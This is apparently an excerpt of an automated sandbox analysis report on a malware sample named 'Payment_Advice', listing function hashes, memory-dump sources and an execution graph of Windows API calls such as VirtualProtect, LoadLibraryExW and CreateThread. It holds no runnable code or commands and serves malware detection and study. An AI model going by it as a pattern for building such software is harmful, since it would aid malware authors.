                                                      • Opcode ID: cde76ef0aeecce88ea62fb6d80d48030ac2772e95625837a09937316c08fd7f2
                                                      • Instruction ID: ae13856c34b49b965f807c537bab218a953fbc875be9e39e2942a0c625b55fad
                                                      • Opcode Fuzzy Hash: cde76ef0aeecce88ea62fb6d80d48030ac2772e95625837a09937316c08fd7f2
                                                      • Instruction Fuzzy Hash: 062125B2504204DFDB15DF94E9C4B26BF69FB84328F6085ADE9090B686C336D456CBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 013DD4CC Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1197831107.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13dd000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a5880bb22ed2f6cc543f4025840eef8005e0200a1a6acfe1e1d99a05e961aa0
                                                      • Instruction ID: 4362a8c0362a851b0ff6441edb218c4fd9e63463d423e2eac68a08b4b3961de2
                                                      • Opcode Fuzzy Hash: 5a5880bb22ed2f6cc543f4025840eef8005e0200a1a6acfe1e1d99a05e961aa0
                                                      • Instruction Fuzzy Hash: 752128B2504204DFDB15DF94E9C0B26BF66FB94328F60C569D9050F296C336D456CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 013DD5B3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1197831107.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13dd000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction ID: 8279b544acff391d611ad5a5326fb3ebd598922abd4fe6c64ec90ff4e5fd950f
                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction Fuzzy Hash: 2211B176504240DFCB16CF54D5C4B16BF72FB84328F2486A9D9090B697C336D456CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 013DD4C7 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1197831107.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13dd000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction ID: ebbe97c87991e55b50d20473ccf74c688199f4376f99c1fffcb12615e7a4b1e8
                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction Fuzzy Hash: 0411E6B6504244DFCB16CF54E5C4B16BF72FB84328F24C6A9D8490B297C336D45ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:10.7%
                                                      Dynamic/Decrypted Code Coverage:49.6%
                                                      Signature Coverage:1.3%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:24
                                                      execution_graph 7105 41abc0 7106 41abd8 VirtualProtect VirtualProtect 7105->7106 7108 41b74b 7106->7108 7108->7108 7091 40ac60 7092 40ad67 7091->7092 7093 40ac7a 7091->7093 7094 40ac80 SetFilePointer 7093->7094 7095 40acab 7093->7095 7094->7095 7099 40acb7 7095->7099 7102 40a680 7095->7102 7097 40ace7 7098 40ad2e 7098->7099 7100 40ad35 WriteFile 7098->7100 7099->7097 7101 40acd1 memcpy 7099->7101 7103 40a694 WriteFile 7102->7103 7104 40a6bc 7102->7104 7103->7098 7104->7098 9713 40316b 9714 40dc00 21 API calls 9713->9714 9715 403171 9714->9715 9716 40a134 5 API calls 9715->9716 9717 40317c 9716->9717 9726 40dac0 GetLastError TlsGetValue SetLastError 9717->9726 9719 403182 9727 40dac0 GetLastError TlsGetValue SetLastError 9719->9727 9721 40318a 9722 409800 3 API calls 9721->9722 9723 403195 9722->9723 9724 40db00 3 API calls 9723->9724 9725 4031a4 9724->9725 9726->9719 9727->9721 7109 401005 memset GetModuleHandleW HeapCreate 7110 401044 7109->7110 7159 40da70 HeapCreate TlsAlloc 7110->7159 7112 401053 7162 40a6e0 7112->7162 7114 40105d 7165 409780 HeapCreate 7114->7165 7116 40106c 7166 4092a9 7116->7166 7118 401071 7171 408a2e memset 753CE3E0 CoInitialize 7118->7171 7120 401076 7172 4053b5 RtlInitializeCriticalSection 7120->7172 7122 40107b 7173 405068 7122->7173 7131 40a01a 16 API calls 7132 4010f4 7131->7132 7133 409f88 13 API calls 7132->7133 7134 40110f 7133->7134 7202 40d80a 7134->7202 7136 40112d 7137 405068 4 API calls 7136->7137 7138 40113d 7137->7138 7139 40a01a 16 API calls 7138->7139 7140 401148 7139->7140 7141 409f88 13 API calls 7140->7141 7142 401163 7141->7142 7208 409570 7142->7208 7144 40116f 7214 40dac0 GetLastError TlsGetValue SetLastError 7144->7214 7146 401175 7215 403340 7146->7215 7150 401186 7240 40195b 7150->7240 7153 40119b 7346 403a79 7153->7346 7651 40e2a0 RtlAllocateHeap RtlAllocateHeap TlsSetValue 7159->7651 7161 40da97 7161->7112 7652 40d16c RtlAllocateHeap RtlAllocateHeap RtlInitializeCriticalSection 7162->7652 7164 40a6ee 7164->7114 7165->7116 7653 40cf93 7166->7653 7170 4092c7 RtlInitializeCriticalSection 7170->7118 7171->7120 7172->7122 7663 40dd70 7173->7663 7175 401095 GetStdHandle 7176 409a20 7175->7176 7670 409b0f 7176->7670 7179 4010c3 7186 40a01a 7179->7186 7180 409a4b RtlAllocateHeap 7182 409ad3 HeapFree 7180->7182 7183 409a6e 7180->7183 7182->7179 7681 40d459 7183->7681 7187 40a023 7186->7187 7188 4010ce 7186->7188 7750 40a0d6 7187->7750 7197 409f88 RtlAllocateHeap 7188->7197 7191 40d586 9 API calls 7192 40a033 7191->7192 7193 40a060 7192->7193 7194 40a04e HeapFree 7192->7194 7195 40a073 HeapFree 7193->7195 7196 40a067 HeapFree 7193->7196 7194->7193 7194->7194 7195->7188 7196->7195 7198 409fa7 RtlAllocateHeap 7197->7198 7199 409fbc 7197->7199 7198->7199 7200 40d459 11 API calls 7199->7200 7201 4010e9 7200->7201 7201->7131 7757 40d95d 7202->7757 7205 40d827 RtlAllocateHeap 7206 40d846 memset 7205->7206 7207 40d88a 7205->7207 7206->7207 7207->7136 7209 409690 7208->7209 7210 409698 7209->7210 7211 4096ba SetUnhandledExceptionFilter 7209->7211 7212 4096a1 SetUnhandledExceptionFilter 7210->7212 7213 4096ab SetUnhandledExceptionFilter 7210->7213 7211->7144 7212->7213 7213->7144 7214->7146 7763 40dc00 7215->7763 7219 403355 7777 40dac0 GetLastError TlsGetValue SetLastError 7219->7777 7221 4033aa 7778 40dac0 GetLastError TlsGetValue SetLastError 7221->7778 7223 4033b2 7779 40dac0 GetLastError TlsGetValue SetLastError 7223->7779 7225 4033ba 7780 40dac0 GetLastError TlsGetValue SetLastError 7225->7780 7227 4033c2 7781 40cd60 7227->7781 7231 4033dd 7786 405e30 7231->7786 7233 4033e5 7796 405170 TlsGetValue 7233->7796 7235 40117c 7236 40db00 TlsGetValue 7235->7236 7237 40db46 RtlReAllocateHeap 7236->7237 7238 40db29 RtlAllocateHeap 7236->7238 7239 40db67 7237->7239 7238->7239 7239->7150 7241 40dc00 21 API calls 7240->7241 7242 40196a 7241->7242 7819 40dac0 GetLastError TlsGetValue SetLastError 7242->7819 7244 401970 7820 40dac0 GetLastError TlsGetValue SetLastError 7244->7820 7246 401982 7821 40dac0 GetLastError TlsGetValue SetLastError 7246->7821 7248 40198a 7822 4092d8 7248->7822 7252 401996 LoadLibraryExW 7253 4051a0 3 API calls 7252->7253 7254 4019a3 EnumResourceTypesW FreeLibrary 7253->7254 7281 4019ce 7254->7281 7255 40db90 HeapFree 7256 401bf7 7255->7256 7258 40db90 HeapFree 7256->7258 7257 401a6c 7260 40a0d6 4 API calls 7257->7260 7259 401c00 7258->7259 7261 40db90 HeapFree 7259->7261 7262 401a77 7260->7262 7263 401c09 7261->7263 7830 40dac0 GetLastError TlsGetValue SetLastError 7262->7830 7265 40db90 HeapFree 7263->7265 7268 401c12 7265->7268 7266 401a7d 7831 40dac0 GetLastError TlsGetValue SetLastError 7266->7831 7267 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7267->7281 7270 40db90 HeapFree 7268->7270 7272 40118b 7270->7272 7271 401a85 7832 40dac0 GetLastError TlsGetValue SetLastError 7271->7832 7272->7153 7534 402c6b 7272->7534 7274 401a8d 7833 40dac0 GetLastError TlsGetValue SetLastError 7274->7833 7276 40dac0 GetLastError TlsGetValue SetLastError 7276->7281 7277 401a95 7834 40dac0 GetLastError TlsGetValue SetLastError 7277->7834 7279 401aa2 7835 40dac0 GetLastError TlsGetValue SetLastError 7279->7835 7281->7257 7281->7267 7281->7276 7283 40dc60 wcslen TlsGetValue RtlReAllocateHeap 7281->7283 7328 401bde 7281->7328 7282 401aaa 7836 405d90 7282->7836 7283->7281 7287 401aba 7845 40cd40 7287->7845 7291 401ac7 7292 405e30 5 API calls 7291->7292 7293 401acf 7292->7293 7294 40db00 3 API calls 7293->7294 7295 401ad9 7294->7295 7849 40dac0 GetLastError TlsGetValue SetLastError 7295->7849 7297 401ae3 7850 40dc60 7297->7850 7299 401aeb 7300 40db00 3 API calls 7299->7300 7301 401af5 7300->7301 7855 40dac0 GetLastError TlsGetValue SetLastError 7301->7855 7303 401afb 7856 40dac0 GetLastError TlsGetValue SetLastError 7303->7856 7305 401b03 7857 40dac0 GetLastError TlsGetValue SetLastError 7305->7857 7307 401b0b 7858 40dac0 GetLastError TlsGetValue SetLastError 7307->7858 7309 401b13 7310 40cd40 7 API calls 7309->7310 7311 401b23 7310->7311 7859 405182 TlsGetValue 7311->7859 7313 401b28 7314 405e30 5 API calls 7313->7314 7315 401b30 7314->7315 7316 40db00 3 API calls 7315->7316 7317 401b3a 7316->7317 7860 40dac0 GetLastError TlsGetValue SetLastError 7317->7860 7319 401b40 7861 40dac0 GetLastError TlsGetValue SetLastError 7319->7861 7321 401b48 7862 405ea0 7321->7862 7323 401b58 7324 40db00 3 API calls 7323->7324 7325 401b62 7324->7325 7325->7328 7870 40949e 7325->7870 7328->7255 7330 401b81 7876 40dac0 GetLastError TlsGetValue SetLastError 7330->7876 7332 401b89 7877 4094b2 7332->7877 7336 401b9a 7887 405160 7336->7887 7338 401ba5 7338->7328 7890 40dac0 GetLastError TlsGetValue SetLastError 7338->7890 7340 401bbe 7891 40dac0 GetLastError TlsGetValue SetLastError 7340->7891 7342 401bc6 7343 4094b2 20 API calls 7342->7343 7344 401bd2 7343->7344 7345 40db00 3 API calls 7344->7345 7345->7328 7347 403a7f 7346->7347 7347->7347 7348 40dc00 21 API calls 7347->7348 7355 403a91 7348->7355 7349 405f10 2 API calls 7349->7355 7350 40dac0 GetLastError TlsGetValue SetLastError 7356 403b93 7350->7356 7351 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7351->7355 7352 405f10 2 API calls 7362 403b12 7352->7362 7353 40dac0 GetLastError TlsGetValue SetLastError 7353->7355 7354 405f10 2 API calls 7354->7356 7355->7349 7355->7351 7355->7353 7355->7362 7366 40dc60 wcslen TlsGetValue RtlReAllocateHeap 7355->7366 7356->7350 7356->7354 7359 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7356->7359 7363 403c14 7356->7363 7372 40dc60 wcslen TlsGetValue RtlReAllocateHeap 7356->7372 7357 403c95 7361 40dac0 GetLastError TlsGetValue SetLastError 7357->7361 7364 403d16 7357->7364 7368 405f10 2 API calls 7357->7368 7374 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7357->7374 7387 40dc60 wcslen TlsGetValue RtlReAllocateHeap 7357->7387 7358 40dac0 GetLastError TlsGetValue SetLastError 7358->7362 7359->7356 7361->7357 7362->7352 7362->7356 7362->7358 7371 40dc60 wcslen TlsGetValue RtlReAllocateHeap 7362->7371 7380 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7362->7380 7363->7357 7367 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7363->7367 7373 40dac0 GetLastError TlsGetValue SetLastError 7363->7373 7381 40dc60 wcslen TlsGetValue RtlReAllocateHeap 7363->7381 7922 405f10 7363->7922 7369 40dac0 GetLastError TlsGetValue SetLastError 7364->7369 7375 405f10 2 API calls 7364->7375 7389 40dc60 wcslen TlsGetValue RtlReAllocateHeap 7364->7389 7396 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7364->7396 7402 403d9b 7364->7402 7365 403e20 7370 403ea5 7365->7370 7376 40dac0 GetLastError TlsGetValue SetLastError 7365->7376 7385 405f10 2 API calls 7365->7385 7391 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7365->7391 7398 40dc60 wcslen TlsGetValue RtlReAllocateHeap 7365->7398 7366->7355 7367->7363 7368->7357 7369->7364 7925 40dac0 GetLastError TlsGetValue SetLastError 7370->7925 7371->7362 7372->7356 7373->7363 7374->7357 7375->7364 7376->7365 7378 403eab 7926 403400 7378->7926 7380->7362 7381->7363 7382 405f10 2 API calls 7382->7402 7384 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7384->7402 7385->7365 7386 40db00 3 API calls 7388 403ec4 7386->7388 7387->7357 7392 40949e 17 API calls 7388->7392 7389->7364 7390 40dac0 GetLastError TlsGetValue SetLastError 7390->7402 7391->7365 7393 403ec9 GetModuleHandleW 7392->7393 8019 40dac0 GetLastError TlsGetValue SetLastError 7393->8019 7395 403ee2 8020 40dac0 GetLastError TlsGetValue SetLastError 7395->8020 7396->7364 7397 40dc60 wcslen TlsGetValue RtlReAllocateHeap 7397->7402 7398->7365 7400 403eea 8021 40dac0 GetLastError TlsGetValue SetLastError 7400->8021 7402->7365 7402->7382 7402->7384 7402->7390 7402->7397 7403 403ef2 8022 40dac0 GetLastError TlsGetValue SetLastError 7403->8022 7405 403efa 7406 40cd40 7 API calls 7405->7406 7407 403f0c 7406->7407 8023 405182 TlsGetValue 7407->8023 7409 403f11 7410 405e30 5 API calls 7409->7410 7411 403f19 7410->7411 7412 40db00 3 API calls 7411->7412 7413 403f23 7412->7413 8024 40dac0 GetLastError TlsGetValue SetLastError 7413->8024 7415 403f29 8025 40dac0 GetLastError TlsGetValue SetLastError 7415->8025 7417 403f31 8026 40dac0 GetLastError TlsGetValue SetLastError 7417->8026 7419 403f39 8027 40dac0 GetLastError TlsGetValue SetLastError 7419->8027 7421 403f41 7422 40cd40 7 API calls 7421->7422 7423 403f51 7422->7423 8028 405182 TlsGetValue 7423->8028 7425 403f56 7426 405e30 5 API calls 7425->7426 7427 403f5e 7426->7427 7428 40db00 3 API calls 7427->7428 7429 403f68 7428->7429 8029 4031b1 7429->8029 7433 403f7b 8046 40224e 7433->8046 7436 4051a0 3 API calls 7437 403f8b 7436->7437 8162 401ef4 7437->8162 7443 403f9f 8245 403718 7443->8245 7446 40db00 3 API calls 7447 403fc5 PathRemoveBackslashW 7446->7447 7448 403fd9 7447->7448 8373 409500 7448->8373 7454 403ff3 8433 401c21 7454->8433 7457 40db00 3 API calls 7458 404008 7457->7458 7459 404013 7458->7459 7460 40402b 7458->7460 8534 40548c CreateThread 7459->8534 8544 402fbd 7460->8544 7464 404034 8452 40dac0 GetLastError TlsGetValue SetLastError 7464->8452 7466 40403a 7467 40dc60 3 API calls 7466->7467 7468 404047 7467->7468 8453 40dac0 GetLastError TlsGetValue SetLastError 7468->8453 7470 40404d 8454 40dac0 GetLastError TlsGetValue SetLastError 7470->8454 7472 404055 8455 4060b0 7472->8455 7474 404065 7475 40db00 3 API calls 7474->7475 7476 404070 7475->7476 8462 40dac0 GetLastError TlsGetValue SetLastError 7476->8462 7478 404076 8463 40dac0 GetLastError TlsGetValue SetLastError 7478->8463 7480 404082 7481 40dc60 3 API calls 7480->7481 7482 40408a 7481->7482 7483 40dc60 3 API calls 7482->7483 7484 404095 7483->7484 7485 40dc60 3 API calls 7484->7485 7486 40409f 7485->7486 8464 40dcc0 TlsGetValue 7486->8464 7488 4040a4 8465 40dac0 GetLastError TlsGetValue SetLastError 7488->8465 7490 4040aa 8466 40dac0 GetLastError TlsGetValue SetLastError 7490->8466 7492 4040b2 8467 40a435 7492->8467 7496 4040be 8474 40dac0 GetLastError TlsGetValue SetLastError 7496->8474 7498 4040c8 7499 40dc60 3 API calls 7498->7499 7500 4040d0 7499->7500 7501 40dc60 3 API calls 7500->7501 7502 4040da 7501->7502 8475 405182 TlsGetValue 7502->8475 7504 4040df 8476 405182 TlsGetValue 7504->8476 7506 4040e7 8477 405182 TlsGetValue 7506->8477 7508 4040f0 8478 401d59 7508->8478 7535 40dc00 21 API calls 7534->7535 7536 402c78 7535->7536 9604 40dac0 GetLastError TlsGetValue SetLastError 7536->9604 7538 402c7e 9605 40dac0 GetLastError TlsGetValue SetLastError 7538->9605 7540 402c86 9606 40dac0 GetLastError TlsGetValue SetLastError 7540->9606 7542 402c8e 9607 40dac0 GetLastError TlsGetValue SetLastError 7542->9607 7544 402c96 7545 40cd40 7 API calls 7544->7545 7546 402ca8 7545->7546 9608 405182 TlsGetValue 7546->9608 7548 402cad 7549 405e30 5 API calls 7548->7549 7550 402cb5 7549->7550 7551 40db00 3 API calls 7550->7551 7552 402cbf 7551->7552 9609 40dac0 GetLastError TlsGetValue SetLastError 7552->9609 7554 402cc5 9610 40dac0 GetLastError TlsGetValue SetLastError 7554->9610 7556 402ccd 9611 40dac0 GetLastError TlsGetValue SetLastError 7556->9611 7558 402cd5 9612 40dac0 GetLastError TlsGetValue SetLastError 7558->9612 7560 402cdd 7561 40cd40 7 API calls 7560->7561 7562 402ced 7561->7562 9613 405182 TlsGetValue 7562->9613 7564 402cf2 7565 405e30 5 API calls 7564->7565 7566 402cfa 7565->7566 7567 40db00 3 API calls 7566->7567 7568 402d04 7567->7568 7569 4031b1 35 API calls 7568->7569 7570 402d0c 7569->7570 9614 40dac0 GetLastError TlsGetValue SetLastError 7570->9614 7572 402d16 7573 40224e 121 API calls 7572->7573 7574 402d21 7573->7574 7575 4051a0 3 API calls 7574->7575 7576 402d26 7575->7576 9615 40dac0 GetLastError TlsGetValue SetLastError 7576->9615 7578 402d2c 9616 40dac0 GetLastError TlsGetValue SetLastError 7578->9616 7580 402d34 7581 408f95 31 API calls 7580->7581 7582 402d47 7581->7582 7583 40db00 3 API calls 7582->7583 7584 402d51 7583->7584 7585 402e9e 7584->7585 9617 40dac0 GetLastError TlsGetValue SetLastError 7584->9617 7585->7585 7587 402d68 9618 40dac0 GetLastError TlsGetValue SetLastError 7587->9618 7589 402d70 9619 40dac0 GetLastError TlsGetValue SetLastError 7589->9619 7591 402d78 9620 40dac0 GetLastError TlsGetValue SetLastError 7591->9620 7593 402d80 7594 40cd40 7 API calls 7593->7594 7595 402d92 7594->7595 9621 405182 TlsGetValue 7595->9621 7597 402d97 7598 405e30 5 API calls 7597->7598 7599 402d9f 7598->7599 7600 40db00 3 API calls 7599->7600 7601 402da9 7600->7601 9622 40dac0 GetLastError TlsGetValue SetLastError 7601->9622 7603 402daf 9623 40dac0 GetLastError TlsGetValue SetLastError 7603->9623 7605 402db7 9624 40dac0 GetLastError TlsGetValue SetLastError 7605->9624 7607 402dbf 9625 40dac0 GetLastError TlsGetValue SetLastError 7607->9625 7609 402dc7 7610 40cd40 7 API calls 7609->7610 7611 402dd9 7610->7611 9626 405182 TlsGetValue 7611->9626 7613 402dde 7614 405e30 5 API calls 7613->7614 7615 402de6 7614->7615 7616 40db00 3 API calls 7615->7616 7617 402df0 7616->7617 9627 40dac0 GetLastError TlsGetValue SetLastError 7617->9627 7619 402df6 7620 403255 53 API calls 7619->7620 7621 402e01 7620->7621 7622 40db00 3 API calls 7621->7622 7623 402e0d 7622->7623 9628 40dac0 GetLastError TlsGetValue SetLastError 7623->9628 7625 402e13 7626 403255 53 API calls 7625->7626 7627 402e1e 7626->7627 7628 40db00 3 API calls 7627->7628 7629 402e28 PathAddBackslashW 7628->7629 9629 40dac0 GetLastError TlsGetValue SetLastError 7629->9629 7631 402e37 9630 40dac0 GetLastError TlsGetValue SetLastError 7631->9630 7633 402e47 7634 40dc60 3 API calls 7633->7634 7635 402e4f 7634->7635 7636 40dc60 3 API calls 7635->7636 7637 402e5b 7636->7637 9631 405182 TlsGetValue 7637->9631 7639 402e60 7640 4024b6 34 API calls 7639->7640 7641 402e68 7640->7641 7642 4051a0 3 API calls 7641->7642 7643 402e6d 7642->7643 9632 40dac0 GetLastError TlsGetValue SetLastError 7643->9632 7645 402e77 7646 40dc60 3 API calls 7645->7646 7647 402e7f 7646->7647 7648 40db00 3 API calls 7647->7648 7649 402e8b PathRemoveBackslashW 7648->7649 7650 402fbd 136 API calls 7649->7650 7650->7585 7651->7161 7652->7164 7654 40cfa2 7653->7654 7655 40cfe0 TlsGetValue RtlReAllocateHeap TlsSetValue 7654->7655 7656 40cfb8 TlsAlloc RtlAllocateHeap TlsSetValue 7654->7656 7657 40d01c 7655->7657 7656->7655 7659 4092b4 7657->7659 7661 40d7b2 RtlAllocateHeap 7657->7661 7660 40d16c RtlAllocateHeap RtlAllocateHeap RtlInitializeCriticalSection 7659->7660 7660->7170 7662 40d7ca 7661->7662 7662->7659 7664 40dd81 wcslen 7663->7664 7665 40dded 7663->7665 7666 40ddb6 RtlReAllocateHeap 7664->7666 7667 40dd98 RtlAllocateHeap 7664->7667 7668 40ddf5 HeapFree 7665->7668 7669 40ddd8 7665->7669 7666->7669 7667->7669 7668->7669 7669->7175 7671 409a2f RtlAllocateHeap 7670->7671 7672 409b18 7670->7672 7671->7179 7671->7180 7696 409d5a 7672->7696 7674 409b20 7703 40d586 7674->7703 7677 409b63 HeapFree 7677->7671 7678 409b4f 7679 409b50 HeapFree 7678->7679 7679->7679 7680 409b62 7679->7680 7680->7677 7682 40d47a 7681->7682 7683 40d532 RtlAllocateHeap 7682->7683 7684 40d486 7682->7684 7686 40d547 7683->7686 7687 409ab6 RtlAllocateHeap 7683->7687 7740 40d683 LoadLibraryW 7684->7740 7686->7687 7689 40d570 RtlInitializeCriticalSection 7686->7689 7687->7179 7689->7687 7690 40d4c7 RtlAllocateHeap 7691 40d525 RtlLeaveCriticalSection 7690->7691 7692 40d4dd 7690->7692 7691->7687 7694 40d459 6 API calls 7692->7694 7693 40d4ab 7693->7690 7693->7691 7695 40d4f4 7694->7695 7695->7691 7700 409d6e 7696->7700 7697 409db7 memset 7698 409dd0 7697->7698 7698->7674 7699 409d79 HeapFree 7699->7700 7700->7697 7700->7699 7716 41170a 7700->7716 7721 40d38b 7700->7721 7704 40d593 RtlEnterCriticalSection 7703->7704 7705 40d5f8 7703->7705 7706 40d5ee RtlLeaveCriticalSection 7704->7706 7707 40d5af 7704->7707 7731 40d31d 7705->7731 7711 409b28 HeapFree HeapFree 7706->7711 7710 40d586 4 API calls 7707->7710 7714 40d5b9 HeapFree 7710->7714 7711->7677 7711->7678 7712 40d604 RtlDeleteCriticalSection 7713 40d60e HeapFree 7712->7713 7713->7711 7714->7706 7717 411805 7716->7717 7718 411722 7716->7718 7717->7700 7718->7717 7720 41170a HeapFree 7718->7720 7728 40db90 7718->7728 7720->7718 7722 40d398 RtlEnterCriticalSection 7721->7722 7725 40d3a2 7721->7725 7722->7725 7723 40d454 7723->7700 7724 40d44a RtlLeaveCriticalSection 7724->7723 7726 40d3f5 HeapFree 7725->7726 7727 40d40b 7725->7727 7726->7727 7727->7723 7727->7724 7729 40db9b HeapFree 7728->7729 7730 40dbae 7728->7730 7729->7730 7730->7718 7732 40d335 7731->7732 7733 40d32b RtlEnterCriticalSection 7731->7733 7734 40d352 7732->7734 7735 40d33c HeapFree 7732->7735 7733->7732 7736 40d358 HeapFree 7734->7736 7737 40d36e 7734->7737 7735->7734 7735->7735 7736->7736 7736->7737 7738 40d385 7737->7738 7739 40d37b RtlLeaveCriticalSection 7737->7739 7738->7712 7738->7713 7739->7738 7741 40d6a0 GetProcAddress 7740->7741 7742 40d6cb InterlockedCompareExchange 7740->7742 7743 40d6c0 FreeLibrary 7741->7743 7748 40d6b0 7741->7748 7744 40d6db 7742->7744 7745 40d6ef InterlockedExchange 7742->7745 7743->7742 7746 40d495 RtlEnterCriticalSection 7743->7746 7744->7746 7749 40d6e0 Sleep 7744->7749 7745->7746 7746->7693 7748->7743 7749->7744 7751 40a106 7750->7751 7755 40a0e7 7750->7755 7752 40a02b 7751->7752 7753 40d38b 3 API calls 7751->7753 7752->7191 7753->7751 7754 41170a HeapFree 7754->7755 7755->7752 7755->7754 7756 40d38b 3 API calls 7755->7756 7756->7755 7758 40d81b 7757->7758 7760 40d966 7757->7760 7758->7205 7758->7207 7759 40d991 HeapFree 7759->7758 7760->7759 7761 40d98f 7760->7761 7762 41170a HeapFree 7760->7762 7761->7759 7762->7760 7764 40dc2a TlsGetValue 7763->7764 7765 40dc0c 7763->7765 7767 40334c 7764->7767 7768 40dc3b 7764->7768 7766 40da70 5 API calls 7765->7766 7769 40dc11 TlsGetValue 7766->7769 7774 4051a0 7767->7774 7806 40e2a0 RtlAllocateHeap RtlAllocateHeap TlsSetValue 7768->7806 7797 411a02 7769->7797 7772 40dc40 TlsGetValue 7773 411a02 13 API calls 7772->7773 7773->7767 7807 40e380 GetLastError TlsGetValue SetLastError 7774->7807 7776 4051ab 7776->7219 7777->7221 7778->7223 7779->7225 7780->7227 7784 40cd6d 7781->7784 7808 40ce60 7784->7808 7785 405182 TlsGetValue 7785->7231 7787 405e3d 7786->7787 7816 40de20 TlsGetValue 7787->7816 7790 40dea0 2 API calls 7791 405e51 7790->7791 7792 405e5d 7791->7792 7818 40df70 TlsGetValue 7791->7818 7794 405e8d 7792->7794 7795 405e80 CharUpperW 7792->7795 7794->7233 7795->7233 7796->7235 7798 411a12 TlsAlloc RtlInitializeCriticalSection 7797->7798 7799 411a2e TlsGetValue 7797->7799 7798->7799 7800 411a44 RtlAllocateHeap 7799->7800 7801 411acb RtlAllocateHeap 7799->7801 7802 411adf 7800->7802 7803 411a5e RtlEnterCriticalSection 7800->7803 7801->7802 7802->7767 7804 411a70 7 API calls 7803->7804 7805 411a6e 7803->7805 7804->7801 7805->7804 7806->7772 7807->7776 7809 40ce6c 7808->7809 7812 40dea0 TlsGetValue 7809->7812 7813 40debb 7812->7813 7814 40dee1 RtlReAllocateHeap 7813->7814 7815 4033d8 7813->7815 7814->7815 7815->7785 7817 405e45 7816->7817 7817->7790 7818->7792 7819->7244 7820->7246 7821->7248 7823 40dea0 2 API calls 7822->7823 7824 4092ea GetModuleFileNameW wcscmp 7823->7824 7825 409325 7824->7825 7826 40930d memmove 7824->7826 7892 40dff0 TlsGetValue 7825->7892 7826->7825 7828 401991 7829 405182 TlsGetValue 7828->7829 7829->7252 7830->7266 7831->7271 7832->7274 7833->7277 7834->7279 7835->7282 7837 405d9d 7836->7837 7838 40de20 TlsGetValue 7837->7838 7839 405dc0 7838->7839 7840 40dea0 2 API calls 7839->7840 7841 405dcc 7840->7841 7842 401ab5 7841->7842 7893 40df70 TlsGetValue 7841->7893 7844 405182 TlsGetValue 7842->7844 7844->7287 7894 40ccc0 7845->7894 7848 405182 TlsGetValue 7848->7291 7849->7297 7851 40dc82 7850->7851 7852 40dc73 wcslen 7850->7852 7853 40dea0 2 API calls 7851->7853 7852->7851 7854 40dc8d 7853->7854 7854->7299 7855->7303 7856->7305 7857->7307 7858->7309 7859->7313 7860->7319 7861->7321 7863 405eae 7862->7863 7864 40de20 TlsGetValue 7863->7864 7865 405eca 7864->7865 7866 40dea0 2 API calls 7865->7866 7867 405ed6 7866->7867 7869 405ee2 7867->7869 7910 40df70 TlsGetValue 7867->7910 7869->7323 7911 40cf28 TlsGetValue 7870->7911 7875 40dac0 GetLastError TlsGetValue SetLastError 7875->7330 7876->7332 7878 40cf28 16 API calls 7877->7878 7879 4094c5 7878->7879 7880 40937a 17 API calls 7879->7880 7881 4094d8 7880->7881 7882 40dea0 2 API calls 7881->7882 7883 4094e6 7882->7883 7920 40dff0 TlsGetValue 7883->7920 7885 401b95 7886 40dcc0 TlsGetValue 7885->7886 7886->7336 7921 40e340 TlsGetValue 7887->7921 7889 40516a 7889->7338 7890->7340 7891->7342 7892->7828 7893->7842 7897 40ccd2 7894->7897 7895 40cd1d 7896 40ce60 2 API calls 7895->7896 7898 401ac2 7896->7898 7897->7895 7899 40ccf2 7897->7899 7898->7848 7903 411b20 7899->7903 7901 40ccf8 7909 411b10 ??3@YAXPAX 7901->7909 7904 411b94 malloc 7903->7904 7905 411b2c WideCharToMultiByte 7903->7905 7904->7901 7905->7904 7907 411b60 malloc 7905->7907 7907->7904 7908 411b72 WideCharToMultiByte 7907->7908 7908->7901 7909->7895 7910->7869 7912 4094a9 7911->7912 7913 40cf3b RtlAllocateHeap TlsSetValue 7911->7913 7916 40937a 7912->7916 7914 40cf67 7913->7914 7915 411a02 13 API calls 7914->7915 7915->7912 7917 40cf28 16 API calls 7916->7917 7918 40938b GetCommandLineW 